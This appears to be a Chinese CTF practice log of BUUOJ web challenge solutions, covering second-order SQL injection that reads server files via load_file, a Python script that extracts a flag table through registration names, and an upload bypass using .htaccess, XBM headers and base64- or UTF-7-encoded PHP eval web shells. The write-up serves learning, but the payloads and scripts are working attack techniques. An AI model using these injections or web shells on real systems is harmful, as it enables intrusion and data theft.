2020.04.05近几日buuoj刷题记录

懒得一篇一篇的弄了,把近几日刷的题记录一下

网鼎杯 2018 Comment

1.爆破密码

2.git泄露

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
<?php
include "mysql.php";
session_start();
if($_SESSION['login'] != 'yes'){
header("Location: ./login.php");
die();
}
if(isset($_GET['do'])){
switch ($_GET['do'])
{
case 'write':
$category = addslashes($_POST['category']);
$title = addslashes($_POST['title']);
$content = addslashes($_POST['content']);
$sql = "insert into board
set category = '$category',
title = '$title',
content = '$content'";
$result = mysql_query($sql);
header("Location: ./index.php");
break;
case 'comment':
$bo_id = addslashes($_POST['bo_id']);
$sql = "select category from board where id='$bo_id'";
$result = mysql_query($sql);
$num = mysql_num_rows($result);
if($num>0){
$category = mysql_fetch_array($result)['category'];
$content = addslashes($_POST['content']);
$sql = "insert into comment
set category = '$category',
content = '$content',
bo_id = '$bo_id'";
$result = mysql_query($sql);
}
header("Location: ./comment.php?id=$bo_id");
break;
default:
header("Location: ./index.php");
}
}
else{
header("Location: ./index.php");
}
?>

两个insert操作,在插入数据前都对特殊字符进行了转义,很明显二次注入,它在第二次insert时查询并使用了第一次insert的category,那么category处存在注入

要注意执行的语句是多行的,因此注释符要采用多行注释

3.通过mysql读文件,首先读取/etc/passwd,找到用户home目录,读取.bash_history,再读取.DS_Store,最后发现flag文件名

发帖的category设置为:

1',content=hex(load_file('/var/www/html/flag_8946e1ff1ee3e40f.php')),/*

之后评论:

*/#

那么其执行的语句为:

$sql = "insert into comment
            set category = '1',content=hex(load_file('/var/www/html/flag_8946e1ff1ee3e40f.php')),/*',
                content = '*/#',
                bo_id = '$bo_id'";

便可在content处看到回显

网鼎杯2018 Unfinish

只有注册和登录两个功能,注册时的用户名会在登陆后的页面中显示

经测试可发现在注册时的用户名处存在二次注入,

检测过滤字符:

1' and ',

发现#--information,等都不能使用

因为存在回显,因此可直接使用拼接符将数据带出:

0'+ hex(database()) + '0

但hex编码后,进行相加运算时会将字符串转成整型运算,因此一次hex编码可能结果会不准确

至于flag表…我也是看wp才知道…

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
import requests
import random
import re

url = 'http://7d3b921b-23df-4e79-b88a-778ac08f4770.node3.buuoj.cn/'

flag = ''

for i in range(1,10000, 10):
count = random.randint(1,100000)
payload = "0'+ substr(hex(hex((select * from flag)))from {} for 10) + '0".format(i)
print(payload)

data = {
'email':str(count)+'@qq.com',
'username':payload,
'password':"123456"
}

register = requests.post(url+'register.php', data=data)

headers = {
'Cookie': 'PHPSESSID='+str(count)
}

data = {
'email':str(count)+'@qq.com',
'password':'123456'
}

login = requests.post(url+'login.php', data=data, headers=headers)

index = requests.get(url, headers=headers).text
res = re.findall('<span class="user-name">(.*?)</span>', index, re.S)[0]
res = res.replace(' ', '').replace('\n', '')
flag += res
print(flag)

SUCTF 2019 EasyWeb

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
<?php
function get_the_flag(){
// webadmin will remove your upload file every 20 min!!!!
$userdir = "upload/tmp_".md5($_SERVER['REMOTE_ADDR']);
if(!file_exists($userdir)){
mkdir($userdir);
}
if(!empty($_FILES["file"])){
$tmp_name = $_FILES["file"]["tmp_name"];
$name = $_FILES["file"]["name"];
$extension = substr($name, strrpos($name,".")+1);
if(preg_match("/ph/i",$extension)) die("^_^");
if(mb_strpos(file_get_contents($tmp_name), '<?')!==False) die("^_^");
if(!exif_imagetype($tmp_name)) die("^_^");
$path= $userdir."/".$name;
@move_uploaded_file($tmp_name, $path);
print_r($path);
}
}

$hhh = @$_GET['_'];

if (!$hhh){
highlight_file(__FILE__);
}

if(strlen($hhh)>18){
die('One inch long, one inch strong!');
}

if ( preg_match('/[\x00- 0-9A-Za-z\'"\`~_&.,|=[\x7F]+/i', $hhh) )
die('Try something else!');

$character_type = count_chars($hhh, 3);
if(strlen($character_type)>12) die("Almost there!");

eval($hhh);
?>

part1.无字符执行函数

用异或符构造出_GET

echo urlencode('_GET'^"\xff\xff\xff\xff");

之后调用:

${_GET}{%ff}()&%ff=get_the_flag

part2.文件上传

存在以下限制:

  • 文件内容中不能出现<?

  • 使用了exif_imagetype来判断是不是图片

  • 后缀名中不允许出现ph

通过第一步的构造可以执行phpinfo函数,目标机器使用了apache+php7.2,那么可以想到上传.htaccess文件绕过后缀。

使用xbm格式,X Bit Map,来绕过图片检测;在.htaccess前面加上:

#define width 1337
#define height 1337

#在.htaccess是注释符,因此可被apache正常解析;

绕过<?的方法:

方法1.通过文件包含使用php://filter,将shell进行base64等方式编码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
import requests

url = 'http://4a5937f1-0451-46a2-a64b-9ac04683d515.node3.buuoj.cn/?_=${%ff%ff%ff%ff^%a0%b8%ba%ab}{%ff}();&%ff=get_the_flag'

shell = b'GIF89a12PD9waHAgZXZhbCgkX0dFVFsnYyddKTs/Pg==' # GIF89a后面的12为了保证能够进行base64解码

files = {
'file': ('shell.abc', shell)
}

res = requests.post(url, files=files).text

print(res)

htaccess = b'''
#define width 1337
#define height 1337
AddType application/x-httpd-php .abc
php_value auto_append_file "php://filter/convert.base64-decode/resource=/var/www/html/upload/tmp_76d9f00467e5ee6abc3ca60892ef304e/shell.abc"
'''

print(htaccess)

files = {
'file': ('.htaccess', htaccess)
}

res = requests.post(url, files=files).text
print(res)

方法2.使用utf7、utf16等编码

#define width 1337
#define height 1337
AddType application/x-httpd-php .aaa
php_flag zend.multibyte 1
php_value zend.script_encoding "UTF-7"

之后将shell内容进行相应的编码即可

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
import requests

url = 'http://bd245d1d-9815-4363-b5f2-101a2b3abf96.node3.buuoj.cn/?_=${%ff%ff%ff%ff^%a0%b8%ba%ab}{%ff}();&%ff=get_the_flag'

shell = b'''
#define width 1337
#define height 1337
+ADw?php +AEA-eval(+ACQAXw-POST+AFs't'+AF0)+ADs ?+AD4-
'''

files = {
'file': ('shell.abc', shell)
}

res = requests.post(url, files=files).text

print(res)

htaccess = b'''
#define width 1337
#define height 1337
AddType application/x-httpd-php .abc
php_flag zend.multibyte 1
php_value zend.script_encoding "UTF-7"
'''

print(htaccess)

files = {
'file': ('.htaccess', htaccess)
}

res = requests.post(url, files=files).text
print(res)